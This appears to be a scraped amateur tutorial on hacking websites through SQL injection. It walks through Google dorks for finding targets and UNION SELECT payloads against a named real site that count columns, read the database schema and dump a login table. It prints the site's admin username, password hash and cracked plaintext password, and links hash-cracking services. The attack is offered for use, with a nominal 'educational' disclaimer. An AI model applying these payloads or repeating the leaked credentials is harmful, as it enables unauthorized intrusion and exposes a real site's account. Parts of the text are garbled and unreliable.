Vous êtes sur la page 1sur 13

Hello Guys this is my first tutorial on how to hack into any website with SQL INJECTION: Only 7 steps

and hack any website. NOTE-This tutorial is just for the EDUCATIONAL PURPOSES so anything happen to anyone hackcrack is not responsible for it

ANY PROBLE M AT ANY STEP YOU GET JUST GIVE ME A COMMENT ON MY FACEBOOK CONTACT: https://www.facebook.com/ravi125689 https://www.facebook.com/deepanshu.khanna17

Steps: 1. 2. 3. 4. 5. 6.
7.

Find the vulnerable sites. Find the total number of vulnerable columns. Checking for the version (MYSQL version). Extract the Database. Extract all the tables present in the Database. Extract all the columns present in the Database. Dump the USERNAME and PASSWORD.

Step 1:Find the vulnerable websites:


inurl:index.php?id= inurl:news.php?id= inurl:gallery.php?id= inurl:category.php?id= inurl:games.php?id= inurl:forum.php?id= inurl:newsletter.php?id= inurl:content.php?id=

These are some of the DORKS that I am giving rest the list of DORKS you can very well find on GOOGLE or I ll upload it soon.

Step 2: Find out the total number of VULNERABLE COLUMNS present in the database.
Very simple it is to find just follow the simple steps:

I am taking the below vulnerable website to demonstrate the SQL INJECTION.

http://www.geotunis.org/index_en.php?id=7

Step 2.1: Add [] string to check if the vulnerability is present or not.

http://www.geotunis.org/index_en.php?id=7

Step 2.2: Yupieeee there is an error of MYSQL. Which clearly means that site is vulnerable.

*Note: Many websites after entering the {} string to website do not show any error but sometimes some kind of text got missed or any image file is missed which also shows that the chosen website is vulnerable..

Step 2.3: Next step is to find the columns

http://www.geotunis.org/index_en.php?id=7 order by 1--

order by 1-order by 2-order by 3-order by 9--

no error no error no error and so on

gotcha the error is present

Now the error is present at column number 9 which implies that there are total number of 8 columns present that are vulnerable.

Step 2.4: Time to find out the most vulnerable columns present.

http://www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,4,5,6,7,8--

Now it will show the result present in the URL..

4 and 7 which means there are two most vulnerable columns

*Note- Yea 1 thing I want to tell u about the [-] negative sign after = and before 7. It actually results for the NULL vaule
Now Step 2 is complete we got the total number and most vulnerable columns. Now move on to the STEP3

Step3: Check For the MYSQL version

http://www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,@@version,5,6,7,8-Add

@@version to check which version MYSQL database they are using.

Step4: Checking for the current databse:

http://www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,database(),5,6,7,8-Now the above will tell you the current databse.

Step5: Now extracting the tables from the database:


http://www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--

Step 6: Now extract the columns from the given tables and taking the useful coumns
http://www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database()--

Yupieee we got our useful column login and pass

Step 7: Now you need to dump the login name and the password.. http://www.geotunis.org/index_en.php?id=-7 union all select 1,2,group_concat(login,0x3a,pass,0x3a),4,5,6,7,8 from utilisateurs-*NOTE-utilisateurs is a name of the table where the admin name and pass is present

admin : atign pass: 720a7e98c63c155ae17b0e7d3ce10a09

the given pass is in md5 encryption. Now you need to decrypt the pass for that you can visit to md5
http://www.md5decrypter.co.uk/ http://www.md5decrypt.org/ http://www.md5online.org/

the actual pass after decrypting wasgeo2009